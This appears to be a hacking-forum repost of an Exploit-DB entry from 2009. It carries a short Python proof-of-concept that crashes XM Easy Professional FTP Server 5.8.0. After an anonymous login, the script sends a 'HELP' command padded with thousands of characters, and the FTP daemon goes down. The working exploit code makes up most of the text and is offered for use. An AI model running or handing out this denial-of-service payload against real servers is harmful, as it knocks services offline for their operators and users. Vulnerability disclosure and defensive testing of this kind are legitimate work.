Exploit XM Easy Professional FTP Server 5.8.0 - Denial of Service

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
10257
Проверка EDB
  1. Пройдено
Автор
MERT SARICA
Тип уязвимости
DOS
Платформа
WINDOWS
CVE
N/A
Дата публикации
2009-11-30
Код:
# I discovered a denial-of-service vulnerability on XM Easy Professional
# FTP Server product.
# After successfuly logged-in, when you send "HELP AAAA...(4074 times)",
# ftp daemon crashes.

# -----------------------

# Exploit Title: XM Easy Professional FTP Server 5.8.0 Denial Of Service Vulnerability
# Date: 27.11.2009
# Author: Mert SARICA
# Software Link: http://www.dxm2008.com/data/ftpserversetup.exe
# Version: 5.8.0
# Tested on: Windows XP SP3

# XM Easy Professional FTP Server 5.8.0
# Denial of Service Vulnerability
# Note: FTP account is required for exploitation
# http://www.mertsarica.com

from ftplib import *
import sys
import ftplib

try: 
    ftp = FTP('localhost')   # connect to host, default port
except:
    print "Connection error"
    sys.exit(1)
    
try:
    ftp.login()              # user anonymous, passwd anonymous@
except:
    print "Login failed"
    sys.exit(1)

packet = "HELP " + "MS" * 2037 # magic packet

try:
    ftp.sendcmd(packet)
    ftp.quit()
except ftplib.all_errors, error:
    print("Very good, young padawan, but you still have much to learn...")
 
Источник
www.exploit-db.com

Похожие темы